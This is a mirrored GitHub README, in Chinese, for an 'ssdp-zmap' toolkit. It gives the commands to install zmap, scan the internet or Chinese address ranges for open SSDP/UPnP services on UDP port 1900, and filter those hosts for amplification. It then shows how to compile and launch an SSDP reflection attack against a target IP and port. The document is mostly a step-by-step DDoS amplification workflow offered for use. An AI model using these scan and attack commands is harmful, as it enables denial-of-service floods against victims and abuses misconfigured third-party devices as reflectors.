Giter Site home page Giter Site logo

ssdp-zmap's Introduction

SSDP

yum -y install gcc+ gcc-c++
yum -y install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c cpan vnstat zmap
yum install cmake gmp-devel gengetopt libpcap-devel flex byacc json-c-devel libunistring-devel
wget ftp://ftp.gnu.org/gnu/gengetopt/gengetopt-2.22.6.tar.gz
tar -zvxf gengetopt-2.22.6.tar.gz
cd gengetopt-2.22.6
./configure
make
make install

安装zmap

yum install git
git clone https://github.com/zmap/zmap
cd zmap/
cmake .
make -j4
make install

安装完成!
扫描全球:
screen zmap -M udp -p 1900 --probe-args=file:upnp_1900.pkt -o ssdp.txt
扫描国内:
screen zmap -M udp -p 1900 -w cn.txt -B 100M --probe-args=file:upnp_1900.pkt -o ssdpscan.txt
扫描完成后,我们开始执行过滤!
过滤 :
php ssdpfilter.php ssdp.txt ssdpfiltered.txt 200 1000
200处理个数 1000线程
全自动:screen ./scan 1
自动过滤跟扫描,到时候表完成过后是ssdp.txt
编译攻击脚本:
gcc -pthread ssdp.c -o ssdp
SSDP攻击:
./ssdp <target IP> <target port> <reflection file> <time (optional)>

ssdp-zmap's People

Contributors

nolovenodie avatar

Stargazers

 avatar  avatar  avatar  avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.